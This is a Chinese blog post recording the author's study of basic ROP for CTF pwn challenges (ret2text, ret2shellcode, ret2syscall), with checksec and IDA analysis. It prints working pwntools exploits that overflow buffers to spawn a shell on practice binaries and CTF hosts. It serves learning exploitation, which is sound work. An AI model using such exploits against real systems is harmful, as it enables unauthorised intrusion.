<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>基本ROP | Hexo</title>
  <meta name="description" content="ROP学习记录  ROP的全称为Return-oriented programming（返回导向编程）  保护机制： DEP（堆栈不可执行） ASLR（内存地址随机化） Stack Protector（栈保护） NX:No-eXecute(不可执行),基本原理是将数据所在的内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是">
<meta property="og:type" content="article">
<meta property="og:title" content="基本ROP">
<meta property="og:url" content="https://username.github.io/2023/01/09/%E5%9F%BA%E6%9C%ACROP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="ROP学习记录  ROP的全称为Return-oriented programming（返回导向编程）  保护机制： DEP（堆栈不可执行） ASLR（内存地址随机化） Stack Protector（栈保护） NX:No-eXecute(不可执行),基本原理是将数据所在的内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174628094.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109173622643.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174000217.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174152052.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174720749.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109171259776.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109171321263.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109171458825.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109175501253.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110101717904.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110101756013.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110113139785.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110113321067.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111220954624.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111205640970.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111205657037.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111230849214.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111233344182.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111233420990.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112000249091.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112000212977.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112000423520.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112003104812.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112005612873.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112005755633.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112011519750.png">
<meta property="og:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112012732272.png">
<meta property="article:published_time" content="2023-01-09T08:29:01.000Z">
<meta property="article:modified_time" content="2023-01-11T17:43:14.837Z">
<meta property="article:author" content="wased">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="ROP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174628094.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://username.github.io/2023/01/09/%E5%9F%BA%E6%9C%ACROP/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    <link href="//cdn.jsdelivr.net/npm/katex@0.9.0/dist/katex.min.css" rel="stylesheet">
  
  
  
  
<meta name="generator" content="Hexo 6.3.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/was3d" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">wased</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">Binary</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Sichuan, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/was3d" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a><span class="category-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ROP/" rel="tag">ROP</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/ROP/" style="font-size: 13px;">ROP</a> <a href="/tags/pwn/" style="font-size: 13px;">pwn</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/01/">一月 2023</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/09/">九月 2022</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
              </p>
              <p class="item-title">
                <a href="/2023/01/09/%E5%9F%BA%E6%9C%ACROP/" class="title">基本ROP</a>
              </p>
              <p class="item-date">
                <time datetime="2023-01-09T08:29:01.000Z" itemprop="datePublished">2023-01-09</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2022/09/25/hello-world/" class="title">Hello World</a>
              </p>
              <p class="item-date">
                <time datetime="2022-09-25T02:41:38.598Z" itemprop="datePublished">2022-09-25</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
  <aside class="sidebar sidebar-toc collapse   in  " id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">文章目录</h3>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#rop%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95"><span class="toc-number">1.</span> <span class="toc-text"> ROP学习记录</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2text"><span class="toc-number">1.1.</span> <span class="toc-text"> ret2text</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.1.</span> <span class="toc-text"> 原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%83%E4%B9%A0"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 练习：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#pwn1_1"><span class="toc-number">1.1.2.1.</span> <span class="toc-text"> pwn1_1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ctfhub_ret2text"><span class="toc-number">1.1.2.2.</span> <span class="toc-text"> CTFHUB_ret2text:</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2shellcode"><span class="toc-number">1.2.</span> <span class="toc-text"> ret2shellcode</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-2"><span class="toc-number">1.2.1.</span> <span class="toc-text"> 原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%83%E4%B9%A0-2"><span class="toc-number">1.2.2.</span> <span class="toc-text"> 练习</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ret2shellcode-2"><span class="toc-number">1.2.2.1.</span> <span class="toc-text"> ret2shellcode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pwn2_2"><span class="toc-number">1.2.2.2.</span> <span class="toc-text"> pwn2_2</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2syscall"><span class="toc-number">1.3.</span> <span class="toc-text"> ret2syscall</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-3"><span class="toc-number">1.3.1.</span> <span class="toc-text"> 原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%83%E4%B9%A0-3"><span class="toc-number">1.3.2.</span> <span class="toc-text"> 练习：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ctfwiki_ret2syscall"><span class="toc-number">1.3.2.1.</span> <span class="toc-text"> ctfwiki_ret2syscall</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pwn3_1"><span class="toc-number">1.3.2.2.</span> <span class="toc-text"> pwn3_1</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2libc"><span class="toc-number">1.4.</span> <span class="toc-text"> ret2libc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-4"><span class="toc-number">1.4.1.</span> <span class="toc-text"> 原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%83%E4%B9%A0-4"><span class="toc-number">1.4.2.</span> <span class="toc-text"> 练习：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ret2libc1%E6%9C%89binsh%E5%92%8Csystem%E5%87%BD%E6%95%B0"><span class="toc-number">1.4.2.1.</span> <span class="toc-text"> ret2libc1（有’&#x2F;bin&#x2F;sh‘和system函数）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ret2libc2%E6%9C%89system%E5%87%BD%E6%95%B0%E6%97%A0binsh"><span class="toc-number">1.4.2.2.</span> <span class="toc-text"> ret2libc2(有system函数无’&#x2F;bin&#x2F;sh’)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ret2libc3%E6%97%A0system%E5%87%BD%E6%95%B0%E6%97%A0binsh"><span class="toc-number">1.4.2.3.</span> <span class="toc-text"> ret2libc3(无system函数无’&#x2F;bin&#x2F;sh’)</span></a></li></ol></li></ol></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-基本ROP" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      基本ROP
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2023/01/09/%E5%9F%BA%E6%9C%ACROP/" class="article-date">
	  <time datetime="2023-01-09T08:29:01.000Z" itemprop="datePublished">2023-01-09</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/ROP/" rel="tag">ROP</a>, <a class="article-tag-link-link" href="/tags/pwn/" rel="tag">pwn</a>
  </span>


        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2023/01/09/%E5%9F%BA%E6%9C%ACROP/#comments" class="article-comment-link">评论</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 1.6k(字)</span>
	
	
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 6(分)</span>
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="rop学习记录"><a class="markdownIt-Anchor" href="#rop学习记录"></a> ROP学习记录</h1>
<blockquote>
<p>ROP的全称为Return-oriented programming（返回导向编程）</p>
</blockquote>
<p>保护机制：</p>
<p>DEP（堆栈不可执行）</p>
<p>ASLR（内存地址随机化）</p>
<p>Stack Protector（栈保护）</p>
<p>NX:No-eXecute(不可执行),基本原理是将数据所在的内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。</p>
<p>主要思想：在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程</p>
<p><strong>ROP攻击一般条件：</strong></p>
<ul>
<li>程序存在溢出，并且可以控制返回地址</li>
<li>可以找到满足条件的 gadgets(不相邻的程序已有的代码 ) 以及相应 gadgets 的地址</li>
</ul>
<h2 id="ret2text"><a class="markdownIt-Anchor" href="#ret2text"></a> ret2text</h2>
<h3 id="原理"><a class="markdownIt-Anchor" href="#原理"></a> 原理</h3>
<p>ret2text 即控制程序执行程序本身已有的的代码 (.text)</p>
<h3 id="练习"><a class="markdownIt-Anchor" href="#练习"></a> 练习：</h3>
<h4 id="pwn1_1"><a class="markdownIt-Anchor" href="#pwn1_1"></a> pwn1_1</h4>
<p>checksec:</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174628094.png" alt="image-20230109174628094" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109173622643.png" alt="image-20230109173622643" /></p>
<p>ida分析后发现这里读入是通过read，且这里的读取长度4096&gt;buf的定义16,可造成溢出</p>
<p>这里可见后门函数：<img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174000217.png" alt="image-20230109174000217" /></p>
<p>这里分析buf函数以找出返回地址</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174152052.png" alt="image-20230109174152052" /></p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;gxh191.top&quot;</span>,<span class="number">25537</span>)</span><br><span class="line">p.recv()</span><br><span class="line">p.send(<span class="string">b&quot;a&quot;</span>*(<span class="number">16</span>+<span class="number">8</span>) + p64(<span class="number">0x40119E</span>))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="ctfhub_ret2text"><a class="markdownIt-Anchor" href="#ctfhub_ret2text"></a> CTFHUB_ret2text:</h4>
<p>checksec:</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109174720749.png" alt="image-20230109174720749" /></p>
<p>ida分析代码</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109171259776.png" alt="image-20230109171259776" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109171321263.png" alt="image-20230109171321263" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109171458825.png" alt="image-20230109171458825" /></p>
<p>EXP如下：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#sh = process(&#x27;./ret2text&#x27;)</span></span><br><span class="line">sh= remote(<span class="string">&quot;challenge-b3dded864d8eec43.sandbox.ctfhub.com&quot;</span>,<span class="number">26822</span>)</span><br><span class="line">target = <span class="number">0x04007B8</span></span><br><span class="line">sh.sendline(<span class="string">b&#x27;A&#x27;</span> * (<span class="number">120</span>) + p64(target))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="ret2shellcode"><a class="markdownIt-Anchor" href="#ret2shellcode"></a> ret2shellcode</h2>
<h3 id="原理-2"><a class="markdownIt-Anchor" href="#原理-2"></a> 原理：</h3>
<p>即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码</p>
<p>**注意：**要想执行shellcode，需要对应的程序在运行时shellcode所在的位置具有可执行权限,</p>
<p><strong>基本思路：</strong> 先找到溢出点，确定溢出位后看是否可在bss段写数据，确定可写后将shellcode的数据发送到bss段，最后通过覆盖跳转地址跳转到shellcode所在的地址进行执行</p>
<blockquote>
<p>BSS段（bss segment）通常是指用来存放程序中<strong>未初始化</strong>的或者<strong>初始化为0</strong>的<strong>全局变量</strong>和<strong>局部静态变量</strong>的一块内存区域。BSS是英文<strong>Block Started by Symbol</strong>的简称。BSS段属于<em>静态内存分配</em></p>
</blockquote>
<h3 id="练习-2"><a class="markdownIt-Anchor" href="#练习-2"></a> 练习</h3>
<h4 id="ret2shellcode-2"><a class="markdownIt-Anchor" href="#ret2shellcode-2"></a> ret2shellcode</h4>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230109175501253.png" alt="image-20230109175501253" /></p>
<p>程序几乎没有开启任何保护</p>
<p>这里ida分析：<img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110101717904.png" alt="image-20230110101717904" /></p>
<p>看到将s的数据复制到了buf2，而buf2在.bss段：<img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110101756013.png" alt="image-20230110101756013" /></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2shellcode&#x27;</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())<span class="comment"># asm(shellcraft.sh())该语句生成shellcode</span></span><br><span class="line">buf2_addr = <span class="number">0x804a080</span></span><br><span class="line"></span><br><span class="line">sh.sendline(shellcode.ljust(<span class="number">112</span>, <span class="string">&#x27;A&#x27;</span>) + p32(buf2_addr))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="pwn2_2"><a class="markdownIt-Anchor" href="#pwn2_2"></a> pwn2_2</h4>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110113139785.png" alt="image-20230110113139785" /></p>
<p>这里修改了phone_number所在的bss段的权限，权限7表示可读可写可执行</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230110113321067.png" alt="image-20230110113321067" /></p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">sh = process(<span class="string">&#x27;./pwn2_2&#x27;</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">buf2_addr = <span class="number">0x04040A0</span></span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(shellcode)</span><br><span class="line">sh.recv()</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">24</span>+p64(buf2_addr)</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>关于这里的context:</p>
<blockquote>
<p>context 是 pwntools 用来设置环境的功能。在很多时候，由于二进制文件的情况不同，我们可能需要进行一些环境设置才能够正常运行exp，比如有一些需要进行汇编，但是32的汇编和64的汇编不同，如果不设置context会导致一些问题,一般来说我们设置context只需要简单的一句话:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;context(os=&#x27;linux&#x27;, arch=&#x27;amd64&#x27;, log_level=&#x27;debug&#x27;)</span><br></pre></td></tr></table></figure>
<p>或者 <code>context(os='linux', arch='amd64')</code></p>
<ol>
<li>os设置系统为linux系统，在完成ctf题目的时候，大多数pwn题目的系统都是linux</li>
<li>arch设置架构为amd64，可以简单的认为设置为64位的模式，对应的32位模式是’i386’</li>
<li>log_level设置日志输出的等级为debug，这句话在调试的时候一般会设置，这样pwntools会将完整的io过程都打印下来，使得调试更加方便，可以避免在完成CTF题目时出现一些和IO相关的错误。</li>
</ol>
</blockquote>
<h2 id="ret2syscall"><a class="markdownIt-Anchor" href="#ret2syscall"></a> ret2syscall</h2>
<h3 id="原理-3"><a class="markdownIt-Anchor" href="#原理-3"></a> 原理：</h3>
<p>ret2syscall，即控制程序执行系统调用，获取 shell</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111220954624.png" alt="" /></p>
<p><strong>前置条件</strong>：可以找到更改eax的gadget</p>
<hr />
<p>32位程序：</p>
<p>目的是为了执行execve(“bin/sh”,NULL,NULL)</p>
<p>​							eax		ebx					ecx	edx</p>
<p>​							0xb		”bin/sh&quot;的地址	0		0</p>
<p><strong>最后要以int 0x80结尾</strong></p>
<p>其中eax存储0xb是execve函数对应的系统调用号</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//系统调用号的查看</span><br><span class="line">32位：</span><br><span class="line">cat /usr/include/asm/unistd_32.h</span><br><span class="line">64位：</span><br><span class="line">cat /usr/include/asm/unistd_64.h</span><br></pre></td></tr></table></figure>
<p>通过ROPgadget工具进行查找gadget</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1.ROPgadget找gadget</span><br><span class="line">ROPgadget --binary filename --only ‘pop|ret&#x27; |grep &#x27;eax&#x27;</span><br><span class="line">					文件名							寄存器名</span><br><span class="line">|grep &#x27;eax&#x27;可省略</span><br><span class="line">2.ROPgadget找&#x27;/bin/sh&#x27;字符串</span><br><span class="line">ROPgadget --binary filename --string&quot;/bin/sh&quot;</span><br><span class="line">					文件名	</span><br></pre></td></tr></table></figure>
<hr />
<h3 id="练习-3"><a class="markdownIt-Anchor" href="#练习-3"></a> 练习：</h3>
<h4 id="ctfwiki_ret2syscall"><a class="markdownIt-Anchor" href="#ctfwiki_ret2syscall"></a> ctfwiki_ret2syscall</h4>
<p>该程序是一个32位的程序：</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111205640970.png" alt="image-20230111205640970" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111205657037.png" alt="image-20230111205657037" /></p>
<p>通过ROPgadget查找需要的语句</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111230849214.png" alt="image-20230111230849214" /></p>
